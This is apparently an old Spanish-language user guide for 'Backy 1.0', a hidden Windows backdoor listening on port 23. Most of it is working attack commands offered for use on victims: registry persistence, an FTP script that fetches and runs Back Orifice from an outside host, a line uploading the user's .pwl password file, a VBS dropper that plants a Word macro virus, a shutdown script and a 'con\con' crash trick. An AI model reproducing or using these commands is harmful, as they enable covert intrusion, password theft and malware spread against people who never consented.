
Guia de Usuario de Backy 1.0 o Dos para Dummies
-----------------------------------------------

Backy es un programa hecho por Vil ROach / Trenchcoat Legion , y su modo de funcionar es muy sim-
ple , lo que hace es esperar cualquer conexion por el puerto 23 e inmediatamente se produzca usar 
los caracteres que recibe como ordenes para el prompt del DOS , el cual se ejecutar escondido ob-
viamente ;)

Para instalarlo simplemente se debe ejcutar el archivo , si se quiere desinstalar se debe borrar
la cdena :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sysmon

y el archivo :

c:\Windows\WinMon32.Exe

Lo primero que podemos hacer es explorar la maquina , y esto lo hacemos con comandos como :

dir C:\*.*_ 
Type (nombre).txt | more _ 
dir /s C:\*.skr _  ; el /s hace que busque en los subdirectorios , y skr es la extension de la 
                   ; clave de PGP ;)

NOTA IMPORTANTE ! : Por alguna razon el programa se traba cuando mandamos un enterazo o sea que
                    presionamos Enter , asi que debemos recordar terminar los comandos con un "_"
                    y no con un Enter !.

-Si queremos introducir informacion en el registro , simplemente lo hacemos asi :

;recuerda que con > introducimos datos en un file nuevo y con >> lo vamos agregando al final 
echo REGEDIT4 > C:\win32.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> C:\win32.reg
echo "System"="Sys.Exe" >> C:\win32.reg  ;creamos el archivo .reg
  
start C:\win32.reg   ; y lo abrimos con Regedit
del C:\win32.reg ;y de esta forma guardamos la informacion que queramos



-Si queremos bajar al computador un archivo por ftp , lo hacemos asi :

echo o webjump.vil_roach.com > C:\win32.sys_
echo user vilroach >> C:\win32.sys_
echo pass password >> C:\win32.sys_
echo cd img >> C:\win32.sys_
echo binary >> C:\win32.sys_
echo get boserve.exe >> C:\win32.sys_
echo quit >> C:\win32.sys_   ;creamos un archivo que servira de script al Ftp de DOS

ftp.exe -n -s:c:\Win32.sys_ ; ejecutamos el DOS y le decimo que ejecute lo que dice el archivo

start boserve.exe  ; y le instalamos Back Orifice en su maquinucha ;)

Si quisieramos que el nos mandar un archivo cambiariamos "echo get boserve.exe >> C:\win32.sys_"
por digamos :

echo put c:\windows\user.pwl >> C:\win32.sys_ ;)

-Y si queremos infectar el computador con un virus de Word , por ejemplo hacemos esto :

echo On error resume next > C:\Winstart.Vbs
echo Set WordObj = CreateObject("Word.Application") >> C:\Winstart.Vbs
echo WordObj.NormalTemplate.VBProject.VBComponents.import ("c:\windows\res.dll") >> C:\Winstart.Vbs ;res.dll es la fuente del virus        
echo WordObj.NormalTemplate.save >> C:\Winstart.Vbs                                      
echo WordObj.Quit  >> C:\Winstart.Vbs 

start Winstart.Vbs

-Si quisieramos saludar al usuario lo hariamos asi :

echo  MsgBox "Hola Usuario","ESTUPIDO!!!" >> C:\Win32Dll.Vbs
start Win32Dll.Vbs

-Si quisieramos apagar su computador lo podmeos hacer asi :
echo On error resume next > C:\Winstart.Vbs
echo Set WordObj = CreateObject("Word.Application") >> C:\Winstart.Vbs
echo WordObj.Tasks.ExitWindows

Definitivamente la mas importante de todas es la del ftp , ya que nso permite pasar y obtener fi-
les , lo cual es lo mas util , para por ejemplo instalar keyloggers,troyanos,etc. y tambien nos
permite obtener Pwl's o cialquier archivo curioso que veamos por ahi. Por ultimo un comando que
debe de resultar lo mas de entretenido para el usuario :

cd con\con

Nota Final : Lamentablemnte el programa aun esta en la version 1.0 por lo que puede resultar un 
poco inestable, especialmente cuando nos conectamos, nos desconectamos y tratamos de conectarnos
en una misma sesion , el programa tendera a funcionar extraamenmte , por lo que recomeindo que 
una vez conecytado hagamos todo lo que tengamos que hacer o simplemente que nos quedemos cone-
ctados todo el tiepmpo para evitar tener que volvernos a conectar .

Special Thanks to Me !
                            Vil ROac / Trenchcoat Legion -  NO !

vil_roach@uole.com
